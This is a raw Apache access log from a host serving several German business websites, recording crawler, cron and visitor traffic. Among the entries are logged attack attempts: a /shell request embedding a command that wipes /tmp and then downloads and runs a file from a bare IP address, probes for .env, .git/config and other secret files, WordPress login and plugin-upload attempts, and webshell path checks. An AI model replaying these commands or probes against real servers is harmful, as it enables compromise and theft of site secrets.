138.229.108.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/wpglobus/flags/de.png HTTP/1.1" 200 181 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/uploads/lhst.png HTTP/1.1" 200 6582 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/it.png HTTP/1.1" 200 228 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/ru.png HTTP/1.1" 200 169 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/ua.png HTTP/1.1" 200 210 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/pl.png HTTP/1.1" 200 155 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/uk.png HTTP/1.1" 200 412 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/fr.png HTTP/1.1" 200 229 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:39 +0100] "GET /wp-content/plugins/wpglobus/flags/es.png HTTP/1.1" 200 253 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
:: - - [06/Nov/2023:01:44:45 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
81.169.178.0 - - [06/Nov/2023:01:45:21 +0100] "POST /wp-cron.php?doing_wp_cron=1699231521.1968460083007812500000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699231521.1968460083007812500000" "WordPress/5.2.19; https://www.computerdoc24.de"
51.222.253.0 - - [06/Nov/2023:01:45:21 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.55.39.0 - - [06/Nov/2023:01:47:47 +0100] "GET /robots.txt HTTP/1.1" 301 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.0 - - [06/Nov/2023:01:47:52 +0100] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:01:49:23 +0100] "POST /wp-cron.php?doing_wp_cron=1699231763.5577390193939208984375 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699231763.5577390193939208984375" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:01:49:23 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
183.136.225.0 - - [06/Nov/2023:01:51:22 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
81.169.178.0 - - [06/Nov/2023:01:59:49 +0100] "POST /wp-cron.php?doing_wp_cron=1699232389.0093679428100585937500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699232389.0093679428100585937500" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:01:59:48 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:01:59:50 +0100] "GET /product-category/aktuelle-angebote/ HTTP/1.1" 200 13464 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.216.204.0 - - [06/Nov/2023:02:00:25 +0100] "GET / HTTP/1.1" 400 226 "-" "-"
35.216.204.0 - - [06/Nov/2023:02:00:25 +0100] "GET / HTTP/1.1" 403 2411 "-" "abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:29 +0100] "GET /server-status HTTP/1.1" 403 2411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:30 +0100] "GET /config.json HTTP/1.1" 404 2557 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:30 +0100] "GET /.env HTTP/1.1" 404 2543 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:31 +0100] "GET /telescope/requests HTTP/1.1" 404 2571 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:31 +0100] "GET /info.php HTTP/1.1" 404 2551 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.204.0 - - [06/Nov/2023:02:00:32 +0100] "GET /.git/config HTTP/1.1" 404 2557 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
3.15.224.0 - - [06/Nov/2023:02:06:47 +0100] "GET /.well-known/acme-challenge/V694OghbkzLt7UDYq7GpPLNMNVpnOztksVgC7LXjMTY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.222.52.0 - - [06/Nov/2023:02:06:47 +0100] "GET /.well-known/acme-challenge/V694OghbkzLt7UDYq7GpPLNMNVpnOztksVgC7LXjMTY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [06/Nov/2023:02:06:47 +0100] "GET /.well-known/acme-challenge/V694OghbkzLt7UDYq7GpPLNMNVpnOztksVgC7LXjMTY HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
81.169.178.0 - - [06/Nov/2023:02:07:49 +0100] "POST /wp-cron.php?doing_wp_cron=1699232869.3540849685668945312500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699232869.3540849685668945312500" "WordPress/5.2.19; https://www.computerdoc24.de"
114.119.157.0 - - [06/Nov/2023:02:07:49 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
41.233.200.0 - - [06/Nov/2023:02:07:55 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+91.92.243.35/jaws;sh+/tmp/jaws HTTP/1.1" 200 2691 "-" "Hello, world"
81.169.178.0 - - [06/Nov/2023:02:08:16 +0100] "POST /wp-cron.php?doing_wp_cron=1699232896.6353349685668945312500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699232896.6353349685668945312500" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:02:08:16 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:02:08:17 +0100] "GET /product-category/aktuelle-angebote/tastatur-und-maus/ HTTP/1.1" 200 12771 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
94.102.61.0 - - [06/Nov/2023:02:11:31 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:02:14:11 +0100] "POST /wp-cron.php?doing_wp_cron=1699233251.5785059928894042968750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699233251.5785059928894042968750" "WordPress/5.2.19; https://www.computerdoc24.de"
188.34.153.0 - - [06/Nov/2023:02:14:11 +0100] "GET / HTTP/1.1" 200 95740 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.212.172.0 - - [06/Nov/2023:02:14:29 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
43.154.107.0 - - [06/Nov/2023:02:16:26 +0100] "POST /api/currency/quotation_new?_timespan=1699233150381 HTTP/1.1" 200 2691 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
43.154.107.0 - - [06/Nov/2023:02:16:27 +0100] "POST /api/currency/quotation_new?_timespan=1699233150381 HTTP/1.1" 200 2691 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 3.5.21022; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
81.169.178.0 - - [06/Nov/2023:02:18:05 +0100] "POST /wp-cron.php?doing_wp_cron=1699233485.7121410369873046875000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699233485.7121410369873046875000" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:02:18:05 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:02:18:06 +0100] "GET /fernwartung/ HTTP/1.1" 200 12447 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.203.211.0 - - [06/Nov/2023:02:21:02 +0100] "GET / HTTP/1.1" 403 2409 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
81.169.178.0 - - [06/Nov/2023:02:21:25 +0100] "POST /wp-cron.php?doing_wp_cron=1699233685.3634030818939208984375 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699233685.3634030818939208984375" "WordPress/5.8.8; https://www.ipcbusiness.de"
189.126.206.0 - - [06/Nov/2023:02:21:25 +0100] "POST /xmlrpc.php HTTP/1.1" 200 247 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
3.15.224.0 - - [06/Nov/2023:02:21:52 +0100] "GET /.well-known/acme-challenge/pQCRhk4xqSDbGNSw_WWCRKCStrm5GII7DTKYWg-PRcA HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [06/Nov/2023:02:21:52 +0100] "GET /.well-known/acme-challenge/pQCRhk4xqSDbGNSw_WWCRKCStrm5GII7DTKYWg-PRcA HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [06/Nov/2023:02:22:18 +0100] "GET /.well-known/acme-challenge/Ye3v9JcH62X3_MvR3VoQpxiOWm2dZ-7WAls_i4rpg10 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.222.145.0 - - [06/Nov/2023:02:22:30 +0100] "GET /.well-known/acme-challenge/-8CP5ve-r8tCHde2jdH6pQzZitsDwNh79ohwAg6QVco HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [06/Nov/2023:02:22:30 +0100] "GET /.well-known/acme-challenge/-8CP5ve-r8tCHde2jdH6pQzZitsDwNh79ohwAg6QVco HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
34.222.52.0 - - [06/Nov/2023:02:22:31 +0100] "GET /.well-known/acme-challenge/-8CP5ve-r8tCHde2jdH6pQzZitsDwNh79ohwAg6QVco HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
194.169.175.0 - - [06/Nov/2023:02:23:52 +0100] "GET /simple.php HTTP/1.1" 200 6626 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.169.175.0 - - [06/Nov/2023:02:24:02 +0100] "GET /chosen.php HTTP/1.1" 200 6624 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
62.138.2.0 - - [06/Nov/2023:02:24:15 +0100] "GET /wp-content/uploads/pc-ankauf.pdf HTTP/1.1" 200 287915 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:02:26:03 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:02:26:03 +0100] "GET /ueber-uns/umweltverantwortung/ HTTP/1.1" 200 11023 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
71.6.232.0 - - [06/Nov/2023:02:27:33 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
51.222.253.0 - - [06/Nov/2023:02:29:56 +0100] "GET /es/ueber-uns/ipc-business-gmbh-firmeninformation/ HTTP/1.1" 200 11961 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
45.61.185.0 - - [06/Nov/2023:02:38:15 +0100] "GET /wp-login.php HTTP/1.1" 200 8647 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9"
45.61.185.0 - - [06/Nov/2023:02:38:15 +0100] "POST /wp-login.php HTTP/1.1" 503 18961 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9"
45.61.185.0 - - [06/Nov/2023:02:38:17 +0100] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 503 7113 "-" "python-requests/2.27.1"
81.169.178.0 - - [06/Nov/2023:02:44:39 +0100] "POST /wp-cron.php?doing_wp_cron=1699235079.3836560249328613281250 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699235079.3836560249328613281250" "WordPress/5.2.19; https://www.computerdoc24.de"
81.169.178.0 - - [06/Nov/2023:02:44:39 +0100] "POST /?wordfence_syncAttackData=1699235079.1902 HTTP/1.1" 200 - "https://www.computerdoc24.de/?wordfence_syncAttackData=1699235079.1902" "WordPress/5.2.19; https://www.computerdoc24.de"
81.169.178.0 - - [06/Nov/2023:02:44:40 +0100] "POST /wp-cron.php?doing_wp_cron=1699235080.2650349140167236328125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699235080.2650349140167236328125" "WordPress/5.2.19; https://www.computerdoc24.de"
62.138.2.0 - - [06/Nov/2023:02:44:39 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:02:44:42 +0100] "GET /presse/ HTTP/1.1" 200 13389 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
107.189.28.0 - - [06/Nov/2023:02:46:34 +0100] "GET /wp-login.php HTTP/1.1" 301 247 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:02:46:38 +0100] "POST /?wordfence_syncAttackData=1699235198.1394 HTTP/1.1" 200 - "https://www.ipcbusiness.de/?wordfence_syncAttackData=1699235198.1394" "WordPress/5.8.8; https://www.ipcbusiness.de"
81.169.178.0 - - [06/Nov/2023:02:46:38 +0100] "POST /wp-cron.php?doing_wp_cron=1699235198.4713330268859863281250 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699235198.4713330268859863281250" "WordPress/5.8.8; https://www.ipcbusiness.de"
107.189.28.0 - - [06/Nov/2023:02:46:38 +0100] "GET /wp-login.php HTTP/1.1" 200 2766 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
95.91.23.0 - - [06/Nov/2023:02:49:09 +0100] "GET /index.html HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:09 +0100] "GET /assets/rollover.js HTTP/1.1" 200 5145 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:09 +0100] "GET /html/fusion.css HTTP/1.1" 200 1161 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:09 +0100] "GET /html/site.css HTTP/1.1" 200 88 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:09 +0100] "GET /html/style.css HTTP/1.1" 200 458 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /subheader_l.gif HTTP/1.1" 200 2832 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/clearpixel.gif HTTP/1.1" 200 43 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /subheader_bl.gif HTTP/1.1" 200 1883 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /header_l.gif HTTP/1.1" 200 7358 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /subheader_br.gif HTTP/1.1" 200 1693 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /subheader_r.gif HTTP/1.1" 200 1036 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Spezialreinigung-_Hhighlighted_1_1.gif HTTP/1.1" 200 1750 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Kontakt_Nregular_1_1.gif HTTP/1.1" 200 1596 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Referenzen_Nregular_1_1.gif HTTP/1.1" 200 1249 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Impressum_Nregular_1_1.gif HTTP/1.1" 200 1218 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Anfahrtskosten_Nregular_1_1.gif HTTP/1.1" 200 1732 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/body_bak.gif HTTP/1.1" 200 49 "https://www.reinigungsprofi-weck.de/html/style.css" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/subheader_bak.gif HTTP/1.1" 200 44 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/autogen/Vorher-Nachher_Nregular_1_1.gif HTTP/1.1" 200 1718 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /assets/images/body_bak1.gif HTTP/1.1" 200 49 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /kv_none_poetic_cream_none_1.gif HTTP/1.1" 200 248 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
95.91.23.0 - - [06/Nov/2023:02:49:10 +0100] "GET /favicon.ico HTTP/1.1" 404 2836 "https://www.reinigungsprofi-weck.de/index.html" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/119.0"
:: - - [06/Nov/2023:02:49:15 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
3.81.139.0 - - [06/Nov/2023:02:53:54 +0100] "GET /robots.txt HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
3.81.139.0 - - [06/Nov/2023:02:53:56 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:02:53:54 +0100] "POST /wp-cron.php?doing_wp_cron=1699235634.8015339374542236328125 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699235634.8015339374542236328125" "WordPress/5.2.19; https://www.computerdoc24.de"
167.94.138.0 - - [06/Nov/2023:02:57:13 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.0 - - [06/Nov/2023:02:57:13 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
51.222.158.0 - - [06/Nov/2023:02:59:04 +0100] "GET /simple.php HTTP/1.1" 301 241 "-" "python-requests/2.27.1"
51.222.158.0 - - [06/Nov/2023:02:59:24 +0100] "GET /simple.php HTTP/1.1" 200 - "-" "python-requests/2.27.1"
81.169.178.0 - - [06/Nov/2023:02:59:24 +0100] "POST /wp-cron.php?doing_wp_cron=1699235964.3389019966125488281250 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699235964.3389019966125488281250" "WordPress/5.8.8; https://www.ipcbusiness.de"
51.222.158.0 - - [06/Nov/2023:02:59:42 +0100] "GET /simple.php HTTP/1.1" 200 9949 "-" "python-requests/2.27.1"
81.169.178.0 - - [06/Nov/2023:03:01:48 +0100] "POST /wp-cron.php?doing_wp_cron=1699236108.3529579639434814453125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699236108.3529579639434814453125" "WordPress/5.2.19; https://www.computerdoc24.de"
3.81.139.0 - - [06/Nov/2023:03:01:48 +0100] "GET / HTTP/1.1" 200 20475 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.235.24.0 - - [06/Nov/2023:03:04:28 +0100] "GET / HTTP/1.1" 200 2691 "-" "-"
81.169.178.0 - - [06/Nov/2023:03:04:57 +0100] "POST /wp-cron.php?doing_wp_cron=1699236297.7377738952636718750000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699236297.7377738952636718750000" "WordPress/5.2.19; https://www.computerdoc24.de"
196.245.181.0 - - [06/Nov/2023:03:04:57 +0100] "GET /kontakt/ HTTP/1.1" 200 14138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68"
107.189.28.0 - - [06/Nov/2023:03:06:54 +0100] "GET //wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 279 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
